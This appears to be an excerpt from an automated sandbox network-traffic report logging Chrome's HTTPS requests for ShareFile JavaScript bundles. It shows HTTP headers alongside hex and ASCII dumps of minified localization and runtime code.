                                                                                                                                                                                                                                                                                Data Ascii: daryContainerBackground:a.DG.grey100},d=(0,i.Z)((0,i.Z)({},s),{},{primary:a.DG.teal700,action:a.DG.teal700,actionHover:a.DG.teal800,listItemSelectedBackground:a.DG.teal100,activeTab:a.DG.teal700,accentColor:a.DG.teal700}),h=(0,i.Z)((0,i.Z)({},s),{},{prima
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC12792INData Raw: 74 69 6c 6c 61 20 64 65 20 66 6f 72 6d 75 6c 61 72 69 6f 22 2c 43 77 54 65 6d 70 6c 61 74 65 49 63 6f 6e 3a 22 50 6c 61 6e 74 69 6c 6c 61 20 64 65 20 66 6c 75 6a 6f 20 64 65 20 74 72 61 62 61 6a 6f 22 2c 43 77 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 49 6e 73 74 61 6e 63 69 61 20 64 65 20 66 6c 75 6a 6f 20 64 65 20 74 72 61 62 61 6a 6f 22 2c 44 63 6d 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 44 43 4d 22 2c 44 77 67 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 44 57 47 22 2c 45 6d 61 69 6c 49 63 6f 6e 3a 22 41 72 63 68 69 76 6f 20 64 65 20 63 6f 72 72 65 6f 20 65 6c 65 63 74 72 c3 b3 6e 69 63 6f 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 63 69 c3 b3 6e 20 64 65 20 61 72 63 68 69 76 6f 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 22 2c
                                                                                                                                                                                                                                                                                Data Ascii: tilla de formulario",CwTemplateIcon:"Plantilla de flujo de trabajo",CwWorkflowIcon:"Instancia de flujo de trabajo",DcmIcon:"Archivo DCM",DwgIcon:"Archivo DWG",EmailIcon:"Archivo de correo electrnico",Empty404Icon:"Ilustracin de archivo no encontrado",
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC6396INData Raw: 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 47 72 65 61 74 65 72 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 73 75 70 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 4c 65 73 73 45 71 75 61 6c 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 70 61 72 69 20 6f 20 69 6e 66 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6d 75 73 74 42 65 4c 65 73 73 45 72 72 6f 72 3a 22 49 6c 20 6e 75 6d 65 72 6f 20 64 65 76 65 20 65 73 73 65 72 65 20 69 6e 66 65 72 69 6f 72 65 20 61 20 7b 7b 6e 75 6d 62 65 72 7d 7d 22 2c 6e 6f 74 4e 75 6d 62 65 72 3a 22 49 6c 20 74 72 61 74 74 69 6e 6f 20 64 65 76 65 20 65 73 73 65 72 65 20
                                                                                                                                                                                                                                                                                Data Ascii: e a {{number}}",mustBeGreaterError:"Il numero deve essere superiore a {{number}}",mustBeLessEqualError:"Il numero deve essere pari o inferiore a {{number}}",mustBeLessError:"Il numero deve essere inferiore a {{number}}",notNumber:"Il trattino deve essere
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC7972INData Raw: 2c 6e 6f 3a 22 4e 65 65 22 2c 70 65 72 63 65 6e 74 3a 22 7b 7b 70 65 72 63 65 6e 74 7d 7d 25 22 2c 73 68 6f 77 5f 70 61 73 73 77 6f 72 64 3a 22 57 61 63 68 74 77 6f 6f 72 64 20 77 65 65 72 67 65 76 65 6e 22 2c 73 76 67 3a 7b 41 69 72 49 63 6f 6e 3a 22 41 49 52 2d 62 65 73 74 61 6e 64 22 2c 41 6c 65 72 74 49 63 6f 6e 3a 22 46 6f 75 74 70 69 63 74 6f 67 72 61 6d 22 2c 41 70 70 72 6f 76 61 6c 73 46 69 6c 65 49 63 6f 6e 3a 22 47 6f 65 64 6b 65 75 72 69 6e 67 73 62 65 73 74 61 6e 64 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 41 75 64 69 6f 62 65 73 74 61 6e 64 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 43 6f 64 65 62 65 73 74 61 6e 64 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 46 6f 72 6d 75 6c 69 65 72 73 6a 61 62 6c 6f 6f 6e 22 2c 43 77 54 65 6d 70 6c 61 74
                                                                                                                                                                                                                                                                                Data Ascii: ,no:"Nee",percent:"{{percent}}%",show_password:"Wachtwoord weergeven",svg:{AirIcon:"AIR-bestand",AlertIcon:"Foutpictogram",ApprovalsFileIcon:"Goedkeuringsbestand",AudioIcon:"Audiobestand",CodeFileIcon:"Codebestand",CwFormIcon:"Formuliersjabloon",CwTemplat


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                141192.168.2.64986213.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC604OUTGET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.7/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 123022
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 19:21:09 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 08 Oct 2024 19:17:21 GMT
                                                                                                                                                                                                                                                                                ETag: "88fe5af93a34045d123f8553a1d1f252"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 f7bf326347bdd7f275a38a22b5b83724.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: McL6f8tLSvahS8m8XL603Z-57xOg1Tjm-1LpgitMqXpvkIOvd_1TQw==
                                                                                                                                                                                                                                                                                Age: 81855
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 61 73 6b 61 67 67 72 65 67 61 74 6f 72 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 73 2e 6e 6f 6e 63 65 21 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 75 3d 61 2e 63 73 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 75 3f 76 6f 69 64 20 30 3a 75 2e 6e 6f 6e 63 65 29 29 73 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3d 3d 3d 28 6c 3d 61 2e 63 73 70 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 6e 6f 6e 63 65 3b 72 65 74 75 72 6e 20 73 2e 69 6e 6e 65 72 48 54 4d 4c 21 3d 3d 65 26 26 28 73 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 29 2c 73 7d 76 61 72 20 66 3d 58 28 65 2c 61 29 3b 72 65 74 75 72 6e 20 66 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 59 28 61 29 2c 74 29 2c 66 7d 66 75 6e 63 74 69 6f 6e 20 6e 65 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 7c 7c 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 67 65 74 52 6f 6f 74 4e 6f 64 65
                                                                                                                                                                                                                                                                                Data Ascii: s.nonce!==(null===(u=a.csp)||void 0===u?void 0:u.nonce))s.nonce=null===(l=a.csp)||void 0===l?void 0:l.nonce;return s.innerHTML!==e&&(s.innerHTML=e),s}var f=X(e,a);return f.setAttribute(Y(a),t),f}function ne(e){var t;return null==e||null===(t=e.getRootNode
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 74 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 74 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 78 29 3a 28 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 78 2c 75 28 65 2c 63 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6a 29 2c 65 7d 2c 74 2e 61 77 72 61 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 5f 5f 61 77 61 69 74 3a 65 7d 7d 2c 45 28 41 2e 70 72 6f 74 6f 74 79 70 65 29 2c 75 28 41 2e 70 72 6f
                                                                                                                                                                                                                                                                                Data Ascii: eratorFunction"===(t.displayName||t.name))},t.mark=function(e){return Object.setPrototypeOf?Object.setPrototypeOf(e,x):(e.__proto__=x,u(e,c,"GeneratorFunction")),e.prototype=Object.create(j),e},t.awrap=function(e){return{__await:e}},E(A.prototype),u(A.pro
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15837INData Raw: 3d 7b 7d 3b 70 28 4f 2c 75 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 29 3b 76 61 72 20 53 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 6a 3d 53 26 26 53 28 53 28 5f 28 5b 5d 29 29 29 3b 6a 26 26 6a 21 3d 3d 69 26 26 61 2e 63 61 6c 6c 28 6a 2c 75 29 26 26 28 4f 3d 6a 29 3b 76 61 72 20 45 3d 6b 2e 70 72 6f 74 6f 74 79 70 65 3d 77 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 4f 29 3b 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 5b 22 6e 65 78 74 22 2c 22 74 68 72 6f 77 22 2c 22 72 65 74 75 72 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 70 28 65 2c 74 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 76 6f
                                                                                                                                                                                                                                                                                Data Ascii: ={};p(O,u,(function(){return this}));var S=Object.getPrototypeOf,j=S&&S(S(_([])));j&&j!==i&&a.call(j,u)&&(O=j);var E=k.prototype=w.prototype=Object.create(O);function A(e){["next","throw","return"].forEach((function(t){p(e,t,(function(e){return this._invo
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 23 23 23 22 29 3e 2d 31 3f 65 2e 72 65 70 6c 61 63 65 28 2f 23 23 23 2f 67 2c 22 2e 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 72 65 74 75 72 6e 21 65 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 6f 72 28 76 61 72 20 69 3d 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 3f 5b 5d 2e 63 6f 6e 63 61 74 28 74 29 3a 74 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 2e 6c 65 6e 67 74 68 3e 31 3b 29 7b 69 66 28 6f 28 29 29 72 65 74 75 72 6e 7b 7d 3b 76 61 72 20 61 3d 72 28 69 2e 73 68 69 66 74 28 29 29 3b 21 65 5b 61 5d 26 26 6e 26 26 28 65 5b 61 5d 3d 6e 65 77 20 6e 29 2c 65 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 7b 7d 7d 72 65
                                                                                                                                                                                                                                                                                Data Ascii: ###")>-1?e.replace(/###/g,"."):e}function o(){return!e||"string"==typeof e}for(var i="string"!=typeof t?[].concat(t):t.split(".");i.length>1;){if(o())return{};var a=r(i.shift());!e[a]&&n&&(e[a]=new n),e=Object.prototype.hasOwnProperty.call(e,a)?e[a]:{}}re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 28 74 5b 30 5d 29 7d 7d 2c 7b 6b 65 79 3a 22 66 6f 72 6d 61 74 4c 61 6e 67 75 61 67 65 43 6f 64 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 3e 2d 31 29 7b 76 61 72 20 74 3d 5b 22 68 61 6e 73 22 2c 22 68 61 6e 74 22 2c 22 6c 61 74 6e 22 2c 22 63 79 72 6c 22 2c 22 63 61 6e 73 22 2c 22 6d 6f 6e 67 22 2c 22 61 72 61 62 22 5d 2c 6e 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 77 65 72 43 61 73 65 4c 6e 67 3f 6e 3d 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 6f 4c 6f 77 65 72
                                                                                                                                                                                                                                                                                Data Ascii: formatLanguageCode(t[0])}},{key:"formatLanguageCode",value:function(e){if("string"==typeof e&&e.indexOf("-")>-1){var t=["hans","hant","latn","cyrl","cans","mong","arab"],n=e.split("-");return this.options.lowerCaseLng?n=n.map((function(e){return e.toLower
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 69 65 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 73 65 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c
                                                                                                                                                                                                                                                                                Data Ascii: Descriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):ie(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}function se(e){var t=function(){if("undefined"==typeof Reflect||!Refl
                                                                                                                                                                                                                                                                                2024-10-09 18:05:24 UTC9492INData Raw: 65 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 72 3d 78 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6e 73 3f 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 5b 65 5d 29 2c 65 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 6e 2e 6f 70 74 69 6f 6e 73 2e 6e 73 2e 70 75 73 68 28 65 29 7d 29 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26 26 74 28 65 29 7d 29 29 2c 72 29 3a 28 74 26 26 74 28 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 7d 7d 2c 7b
                                                                                                                                                                                                                                                                                Data Ascii: es",value:function(e,t){var n=this,r=x();return this.options.ns?("string"==typeof e&&(e=[e]),e.forEach((function(e){n.options.ns.indexOf(e)<0&&n.options.ns.push(e)})),this.loadResources((function(e){r.resolve(),t&&t(e)})),r):(t&&t(),Promise.resolve())}},{


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                142192.168.2.64987213.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC424OUTGET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 262562
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 30 Sep 2024 15:31:51 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "0d0a56254a42d9b0ca24878e2ce733be"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 1ac3fd533bf6be1b511077f8b8e23bfc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: sQrQOg8ainpexg_5pXBKeF3jtlLfERige-tSIXHQtKZQhVft8aLKNA==
                                                                                                                                                                                                                                                                                Age: 37663
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 65 71 75 65 73 74 6c 69 73 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 73 3d 7b 7d 2c 63 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};re
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 73 26 26 21 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 7c 7c 74 68 69 73 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 61 63 63 65 73 73 69 6e 67 20 61 6e 20 6f 62 6a 65 63 74 20 2d 20 62 75 74 20 72 65 74 75 72 6e 4f 62 6a 65 63 74 73 20 6f 70 74 69 6f 6e 73 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 21 22 29 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 74 75 72 6e 65 64 4f 62 6a 65 63 74 48 61 6e 64 6c 65 72 28 76 2c 67 2c 4d 28 4d 28 7b 7d 2c 74 29 2c 7b 7d 2c 7b 6e 73 3a 6c 7d 29 29 3a 22
                                                                                                                                                                                                                                                                                Data Ascii: s&&!this.options.returnObjects){this.options.returnedObjectHandler||this.logger.warn("accessing an object - but returnObjects options is not enabled!");var k=this.options.returnedObjectHandler?this.options.returnedObjectHandler(v,g,M(M({},t),{},{ns:l})):"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 75 6e 65 73 63 61 70 65 53 75 66 66 69 78 7c 7c 22 22 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 3f 50 28 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 50 72 65 66 69 78 45 73 63 61 70 65 64 7c 7c 50 28 22 24 74 28 22 29 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 3d 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 3f 50 28 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 29 3a 74 2e 6e 65 73 74 69 6e 67 53 75 66 66 69 78 45 73 63 61 70 65 64 7c 7c 50 28 22 29 22 29 2c 74 68 69 73 2e 6e 65 73 74 69 6e 67 4f 70 74 69 6f 6e 73 53 65 70 61 72 61 74 6f 72 3d 74 2e 6e 65 73 74 69 6e 67 4f 70 74 69 6f 6e 73 53 65 70 61 72 61 74 6f 72 3f 74 2e 6e 65 73 74 69 6e 67
                                                                                                                                                                                                                                                                                Data Ascii: unescapeSuffix||"",this.nestingPrefix=t.nestingPrefix?P(t.nestingPrefix):t.nestingPrefixEscaped||P("$t("),this.nestingSuffix=t.nestingSuffix?P(t.nestingSuffix):t.nestingSuffixEscaped||P(")"),this.nestingOptionsSeparator=t.nestingOptionsSeparator?t.nesting
                                                                                                                                                                                                                                                                                2024-10-09 18:05:23 UTC16384INData Raw: 61 74 3d 63 2e 66 6f 72 6d 61 74 74 65 72 2e 66 6f 72 6d 61 74 2e 62 69 6e 64 28 63 2e 66 6f 72 6d 61 74 74 65 72 29 29 2c 63 2e 69 6e 74 65 72 70 6f 6c 61 74 6f 72 3d 6e 65 77 20 65 65 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 63 2e 75 74 69 6c 73 3d 7b 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 3a 74 68 69 73 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 2e 62 69 6e 64 28 74 68 69 73 29 7d 2c 63 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 3d 6e 65 77 20 75 65 28 6f 28 74 68 69 73 2e 6d 6f 64 75 6c 65 73 2e 62 61 63 6b 65 6e 64 29 2c 63 2e 72 65 73 6f 75 72 63 65 53 74 6f 72 65 2c 63 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 63 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 6f 6e 28 22 2a 22 2c 28 66 75 6e 63 74
                                                                                                                                                                                                                                                                                Data Ascii: at=c.formatter.format.bind(c.formatter)),c.interpolator=new ee(this.options),c.utils={hasLoadedNamespace:this.hasLoadedNamespace.bind(this)},c.backendConnector=new ue(o(this.modules.backend),c.resourceStore,c,this.options),c.backendConnector.on("*",(funct
